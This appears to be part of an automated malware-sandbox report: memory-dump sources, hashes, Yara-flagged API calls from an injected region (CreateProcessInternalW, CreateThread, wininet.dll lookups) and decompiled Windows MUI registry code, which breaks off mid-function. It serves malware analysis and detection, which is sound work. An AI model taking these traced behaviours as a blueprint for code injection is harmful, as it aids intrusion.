                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00129128
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 63b074d02b32f5d52c03573cb7efcbb94df90b0032c280438d237d9954d47463
                                                • Instruction ID: 13cf65b9f7a3fa184a014270a606409bbaab3d539a131364f2edc624d7d2eac6
                                                • Opcode Fuzzy Hash: 63b074d02b32f5d52c03573cb7efcbb94df90b0032c280438d237d9954d47463
                                                • Instruction Fuzzy Hash: 673192B2900355BBC714DF69D885FA7B7B8FB48B00F10811DF62A6B245D734B560CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00129128
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: a84567f6ebfe09480a29e2c342acf471a990fa459547b2101abd7cc5a8e78633
                                                • Instruction ID: cdf1936c9b9d91564397a52d4a09b87e1dc1aab4223f7e224d9f8bb66fc0f6a3
                                                • Opcode Fuzzy Hash: a84567f6ebfe09480a29e2c342acf471a990fa459547b2101abd7cc5a8e78633
                                                • Instruction Fuzzy Hash: BB21D2B1900351ABC714DF69D8C5FA7B7B8FF48704F10801DF6296B245D774A960CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00113AF8), ref: 0012A69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: 70e88bfada0b541d495cabb85d188d3e0cbb4560133f661edad51ba2218f8d93
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: 8FE04FB12002186FD714DF59DC45EA777ACEF88750F118554FD1857241C630F910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0011836A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0011838B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: eb98dd3dfbfccd50391a5d0e174e4a5484c44bf3fdb2df05183759b85b31f33b
                                                • Instruction ID: 37296ed6b0ab46df64763be12a1043c403b9dbb5613eeda490941cdcc3ab1a47
                                                • Opcode Fuzzy Hash: eb98dd3dfbfccd50391a5d0e174e4a5484c44bf3fdb2df05183759b85b31f33b
                                                • Instruction Fuzzy Hash: CE01A731A9122877E724A6949C43FFE776C6F51F50F094114FF04BA1C1EBD4690546F6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0012A734
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: f9e986440ae8ce675604b72ed862e44a7311548cd55955a6d30ec1fc1a015c0e
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: A201B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0011F050,?,?,00000000), ref: 001291EC
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 90f4d560c854e61cb04fff5511f6c9e31f58e75d6f69431325777fef47646c46
                                                • Instruction ID: 9eb21ae964b034d94d6095e26d970be2f2970a3f6637451d1c83b0119969f49b
                                                • Opcode Fuzzy Hash: 90f4d560c854e61cb04fff5511f6c9e31f58e75d6f69431325777fef47646c46
                                                • Instruction Fuzzy Hash: A5F02E762443513FD7315A686C47FEBBB649F51B20F150169F549DB1C3D794E4124390
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0011F050,?,?,00000000), ref: 001291EC
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                • Instruction ID: 20e70ed5779541b1cf66b9e5118323c45a78919f8daed13dcedabaac9eb49940
                                                • Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                • Instruction Fuzzy Hash: B8E06D373803143AE3206599BC02FA7B29C9B91B20F15003AFA0DEA2C1DA95F81142A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0011F1D2,0011F1D2,?,00000000,?,?), ref: 0012A800
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 74acd7c4576bd7b0bd9d9c9a66c28c11f4d177fc94782425aa7f78d02a80c1ec
                                                • Instruction ID: 0d2a0776f47a4cf9e537762d2714ce19fb0515e64ee8a28f9c2613fa497fdff6
                                                • Opcode Fuzzy Hash: 74acd7c4576bd7b0bd9d9c9a66c28c11f4d177fc94782425aa7f78d02a80c1ec
                                                • Instruction Fuzzy Hash: 06F0E5B2600218ABDB14DF54CC40ED73768EF45310F258154FD086B242C631ED15CBF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0011F1D2,0011F1D2,?,00000000,?,?), ref: 0012A800
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: 6c4b6c94b272d6314400b91d8520528279f4fba4984a800c52b3dad936c0bc71
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: E8E01AB12002186BDB10DF59DC85EEB37ADEF88650F118154BA0857241CA34E8108BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,00118D14,?), ref: 0011F6FB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                • Instruction ID: c87e15c6548643cd66f1d5f12375eead61c029e4affb50fd2c6c1102a298b109
                                                • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                • Instruction Fuzzy Hash: 3CD05E616503082BE610AAA4AC13F6632886B54B00F4A0074F948962C3EA54E4018565
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 94%
                                                			E02538788(signed int __ecx, void* __edx, signed int _a4) {
                                                				signed int _v8;
                                                				short* _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				char _v36;
                                                				signed int _v40;
                                                				char _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				char _v68;
                                                				void* _t216;
                                                				intOrPtr _t231;
                                                				short* _t235;
                                                				intOrPtr _t257;
                                                				short* _t261;
                                                				intOrPtr _t284;
                                                				intOrPtr _t288;
                                                				void* _t314;
                                                				signed int _t318;
                                                				short* _t319;
                                                				intOrPtr _t321;
                                                				void* _t328;
                                                				void* _t329;
                                                				char* _t332;
                                                				signed int _t333;
                                                				signed int* _t334;
                                                				void* _t335;
                                                				void* _t338;
                                                				void* _t339;
                                                
                                                				_t328 = __edx;
                                                				_t322 = __ecx;
                                                				_t318 = 0;
                                                				_t334 = _a4;
                                                				_v8 = 0;
                                                				_v28 = 0;
                                                				_v48 = 0;
                                                				_v20 = 0;
                                                				_v40 = 0;
                                                				_v32 = 0;
                                                				_v52 = 0;
                                                				if(_t334 == 0) {
                                                					_t329 = 0xc000000d;
                                                					L49:
                                                					_t334[0x11] = _v56;
                                                					 *_t334 =  *_t334 | 0x00000800;
                                                					_t334[0x12] = _v60;
                                                					_t334[0x13] = _v28;
                                                					_t334[0x17] = _v20;
                                                					_t334[0x16] = _v48;
                                                					_t334[0x18] = _v40;
                                                					_t334[0x14] = _v32;
                                                					_t334[0x15] = _v52;
                                                					return _t329;
                                                				}
                                                				_v56 = 0;
                                                				if(E02538460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_v56 = 1;
                                                					if(_v8 != 0) {
                                                						_t207 = E0251E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                					}
                                                					_push(1);
                                                					_v8 = _t318;
                                                					E0253718A(_t207);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_v60 = _v60 | 0xffffffff;
                                                				if(E02538460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_t333 =  *_v8;
                                                					_v60 = _t333;
                                                					_t314 = E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					_push(_t333);
                                                					_v8 = _t318;
                                                					E0253718A(_t314);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_t216 = E02538460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                				_t332 = ";";
                                                				if(_t216 < 0) {
                                                					L17:
                                                					if(E02538460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                						L30:
                                                						if(E02538460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                							L46:
                                                							_t329 = 0;
                                                							L47:
                                                							if(_v8 != _t318) {
                                                								E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                							}
                                                							if(_v28 != _t318) {
                                                								if(_v20 != _t318) {
                                                									E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                									_v20 = _t318;
                                                									_v40 = _t318;
                                                								}
                                                							}
                                                							goto L49;
                                                						}
                                                						_t231 = _v24;
                                                						_t322 = _t231 + 4;
                                                						_push(_t231);
                                                						_v52 = _t322;
                                                						E0253718A(_t231);
                                                						if(_t322 == _t318) {
                                                							_v32 = _t318;
                                                						} else {
                                                							_v32 = E0251E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                						}
                                                						if(_v32 == _t318) {
                                                							_v52 = _t318;
                                                							L58:
                                                							_t329 = 0xc0000017;
                                                							goto L47;
                                                						} else {
                                                							E02512340(_v32, _v8, _v24);
                                                							_v16 = _v32;
                                                							_a4 = _t318;
                                                							_t235 = E0252E679(_v32, _t332);
                                                							while(1) {
                                                								_t319 = _t235;
                                                								if(_t319 == 0) {
                                                									break;
                                                								}
                                                								 *_t319 = 0;
                                                								_t321 = _t319 + 2;
                                                								E0251E2A8(_t322,  &_v68, _v16);
                                                								if(E02535553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                								_v16 = _t321;
                                                								_t235 = E0252E679(_t321, _t332);
                                                								_pop(_t322);
                                                							}
                                                							_t236 = _v16;
                                                							if( *_v16 != _t319) {
                                                								E0251E2A8(_t322,  &_v68, _t236);
                                                								if(E02535553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                							}
                                                							if(_a4 == 0) {
                                                								E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                								_v52 = _v52 & 0x00000000;
                                                								_v32 = _v32 & 0x00000000;
                                                							}
                                                							if(_v8 != 0) {
                                                								E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                							}
                                                							_v8 = _v8 & 0x00000000;
                                                							_t318 = 0;
                                                							goto L46;
                                                						}
                                                					}
                                                					_t257 = _v24;
                                                					_t322 = _t257 + 4;
                                                					_push(_t257);
                                                					_v40 = _t322;
                                                					E0253718A(_t257);
                                                					_t338 = _t335 + 4;
                                                					if(_t322 == _t318) {
                                                						_v20 = _t318;
                                                					} else {
                                                						_v20 = E0251E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                					}
                                                					if(_v20 == _t318) {
                                                						_v40 = _t318;
                                                						goto L58;
                                                					} else {
                                                						E02512340(_v20, _v8, _v24);
                                                						_v16 = _v20;
                                                						_a4 = _t318;
                                                						_t261 = E0252E679(_v20, _t332);
                                                						_t335 = _t338 + 0x14;
                                                						while(1) {
                                                							_v12 = _t261;
                                                							if(_t261 == _t318) {
                                                								break;
                                                							}
                                                							_v12 = _v12 + 2;
                                                							 *_v12 = 0;
                                                							E0251E2A8(_v12,  &_v68, _v16);
                                                							if(E02535553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                							_v16 = _v12;
                                                							_t261 = E0252E679(_v12, _t332);
                                                							_pop(_t322);
                                                						}
                                                						_t269 = _v16;
                                                						if( *_v16 != _t318) {
                                                							E0251E2A8(_t322,  &_v68, _t269);
                                                							if(E02535553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                						}
                                                						if(_a4 == _t318) {
                                                							E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                							_v40 = _t318;
                                                							_v20 = _t318;
                                                						}
                                                						if(_v8 != _t318) {
